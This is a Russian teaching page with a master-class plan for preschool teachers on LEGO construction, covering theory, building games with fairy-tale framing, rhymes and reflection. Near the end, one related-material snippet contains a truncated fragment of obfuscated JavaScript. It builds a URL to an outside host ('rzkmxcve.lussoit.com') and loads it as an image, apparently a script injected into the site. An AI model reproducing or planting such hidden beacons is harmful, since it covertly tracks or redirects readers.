МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками
план-конспект занятия по развитию речи (старшая группа)
Добрый день, уважаемые гости. Сегодня на мастер-классе я хотела бы познакомить Лего-конструированием.
Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкновенное чудо: интерес к нему не затухает много десятилетий — с момента его появления в Дании в 1949 году.
Скачать:
Вложение | Размер |
---|---|
master_klass_konspekt_1.docx | 20.69 КБ |
Предварительный просмотр:
МАСТЕР-КЛАСС
Использование ЛЕГО – конструирования
в образовательной работе с дошкольниками
«Истоки способностей и дарований
детей –на кончиках их пальцев».
В. А. Сухомлинский
Целевая аудитория: педагоги дошкольных учреждений.
Цель: повышение профессионального мастерства педагогов-участников мастер-класса по ЛЕГО-конструированию в процессе активного педагогического общения.
Задачи:
- обучать участников мастер-класса навыкам применения ЛЕГО–конструктора в работе с дошкольниками ;
- показать участникам мастер-класса технологии работы с детьми дошкольного возраста в области ЛЕГО-конструирования;
- формировать у участников мастер-класса мотивацию на использование в образовательной деятельности ЛЕГО-конструктора.
Оборудование и материалы: конструктор ЛЕГО, проектор, картотека схем и образцов построек.
Планируемый результат:
- информирование педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста;
- формирование представлений педагогов о возможности работы с ЛЕГО-конструктором.
Мастер-класс для педагогов включает в себя 3 части:
- теоретическую
- практическую
- заключительную
Ход мастер-класса:
1.Теоретическая часть.
- Добрый день, уважаемые гости. Сегодня на мастер-классе я хотела бы познакомить Лего-конструированием.
Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкновенное чудо: интерес к нему не затухает много десятилетий — с момента его появления в Дании в 1949 году.
С того дня и вплоть до настоящего времени Лего (LEGO) ни разу не изменил своему девизу «Играй с удовольствием».
У слова Лего два значения: «я учусь» и «я складываю.
В педагогике Лего-технология интересна тем, что, строясь на интегрированных принципах, объединяет в себе элементы игры и позволяет ребенку думать, фантазировать, и действовать, не боясь ошибиться. ЛЕГО позволяет детям учиться, играя.
«Лего» – умная игра,
Завлекательна, хитра.
Интересно здесь играть,
Строить, составлять, искать!
Приглашаю всех друзей
В «Лего» поиграть скорей.
Там и взрослым интересно:
В «Лего» поиграть полезно!
Сейчас мы окунемся в мир ЛЕГО. Я хотела бы поделиться нашим опытом работы по организации детской деятельности с применением конструктора ЛЕГО.
Мы в своей практике используем конструктор ЛЕГО в разных видах деятельности: на занятиях, на зарядке, в совместной, самостоятельной и индивидуальной работе.
Образовательные области в ДОУ не существуют в «чистом виде». Всегда происходит их интеграция, а с помощью применения Лего-конструирования легко можно интегрировать познавательное развитие, куда и входит техническое конструирование с художественно-эстетическим развитием, когда мы говорим о
2. Практическая часть.
Сегодня я познакомлю вас с некоторыми из вариантов применения Лего-конструирования в различных образовательных областях.
Приглашаю всех побывать сегодня в роли детей.
«Lego» - умная игра,
Увлекательна, хитра!
Интересно здесь играть,
Строить, составлять, искать!
Приглашаю всех друзей
В «Lego» поиграть скорей!
Сначала предлагаю выполнить Игровое упражнение «Волшебная дорожка» с младшими дошкольниками.
- Я предлагаю построить дорогу, но не простую, а волшебную. Чем она необычна? Она состоит из ЛЕГО деталей.
Кирпичик нужный ты найди,
Дорогу в ЛЕГО - страну собери.
Перед Вами конструктор разного цвета и размера.
Послушайте мою сказку.
Жили-были Медвежонок и Зайчонок. Они были лучшими друзьями. Всё лето они бегали и играли с утра и до ночи. Но, наступила осень, и дни стали короче, и солнышко засыпало намного раньше. Бывало заиграются, у кого-нибудь их них, а домой возвращаться темно идти… Ничего не видно вокруг…
Предлагаю Вам помочь героям сказки и построить для них дорожку, но не простую «Радужную». Я буду показывать, а вы повторяйте за мной.
А теперь приступим к строительству дороги. Я кладу первый кирпичик красного цвета, беру кирпичик оранжевого цвета и кладу рядом с красным кирпичиком,….. а вы продолжаете.
- Твой кирпичик похож на мой? По цвету или размеру?
- А почему ты поставил этот кирпичик?
- Давайте посчитаем сколько кирпичиков мы поставили -7
- Все поставили свои кирпичики? Дорога готова?
- Молодцы! Вот какую помощь мы с вами оказали дружным зверятам!
- Что мы закрепляем с детьми, играя в эту игру?
- Закрепляем мы цвет, форму, длину, количество.
- Чтобы никто не потерялся в пути, крепко сцепимся мизинчиками, как детали ЛЕГО и скажем волшебные слова:
Раз, два, три, четыре, пять
Будет дорожка ярко сиять!
Теперь задание усложним ,будем работать с детьми среднего дошкольного возраста.
- А предлагаю я построить по схеме башню, которая как фонари будут стоять около домиков наших лесных друзей и светить им дорогу.
Игровое упражнение «Башня».
Ребята мы будем работать по схемам, перед вами схемы постройки башни и кирпичики «Lego». С помощью «Lego»-кирпичиков необходимо выстроить башню по схеме в определенной цветовой гамме.
- Какой кирпичик мы ставим сначала?
-Кирпичик синего цвета…..
-Какой кирпичик идет вторым?
- кирпичик красного цвета
- Какая получилась у нас башня высокая или низкая??
- Высокая
Давайте посчитаем сколько кирпичиков
-7
-Молодцы!
-давайте поставим наши башни возле наших волшебных дорожек и домиков!
- у дошкольников среднего возраста развиваются математические способности и формируются сенсорные представления: дети, пересчитывая детали, вычисляя необходимое количество деталей, их форму, цвет, длину, закрепляют понятия: «высокий - низкий», «широкий - узкий».
- Продолжим! Еще усложним наши задания! Предлагаю выполнить игровое упражнение «Придумай свою историю» со старшими дошкольниками. Объединимся в группы.
- Каждой группе педагогов предлагаются наборы конструктора и пластины.
Для начала послушайте начало наших историй…
В одном доме жили девочка и мальчик. Они были очень дружные, добрые и веселые. У каждого из них был свой питомец. Играли они всегда вместе в одном дворе … Но вот однажды …
А вот, что было дальше придумайте вы сами и постройте из лего свою историю!
Каждая группа придумывает свою историю, делает постройку и обыгрывает его.
- Послушайте нашу историю тоже!.....
Это и есть творческое воображение каждого ребенка. И у каждого ребёнка своё видение мира, воображение, художественно - эстетический вкус, которое нужно развивать.
- Дорогие, педагоги. В результате задания получились все постройки разные, а истории интересные.
III. Заключительная часть.
И в конце мне хочется сказать…
«Lego» - игра - важнейший спутник детства, позволяющий детям учиться, играя. Каждая постройка из «Lego» - конструктора это фантастическое новое приключение, каждый раз необычное, всегда веселое, познавательное и желанное.
- Дорогие педагоги, играйте с детьми в увлекательные игры с Лего.
Только почувствовав интерес к выполняемой работе, предложенному заданию, сюжету игры, ребенок будет активным, проявит свои творческие способности, научится действовать в команде, брать на себя ответственность.
IV. Рефлексия
- Уважаемые педагоги, сегодня мы с Вами увидели лишь небольшую часть возможностей конструктора «Lego» и вариантами игр с ним.
- Наш мастер - класс подошел к завершению.
- Спасибо за внимание! Желаю Вам, чтобы планы всегда превращались в плоды вашего труда и приносили вам значимые результаты.
По теме: методические разработки, презентации и конспекты
Мастер класс «Использование ЛЕГО - конструирования в образовательной работе с дошкольниками»
Мастер -класс...
мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"
Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста, формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....
Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"
Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...
Мастер-класс "Использование лего-конструирования в образовательной работе с дошкольниками"
мастер-класс...
МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"
МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...
Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»
В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...
МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками
Цель: повышение профессионального мастерства педагогов-участников мастер-классе по ЛЕГО-конструированию в процессе активного педагогического общения.Задачи:обучать участников мастер-класса навыкам при...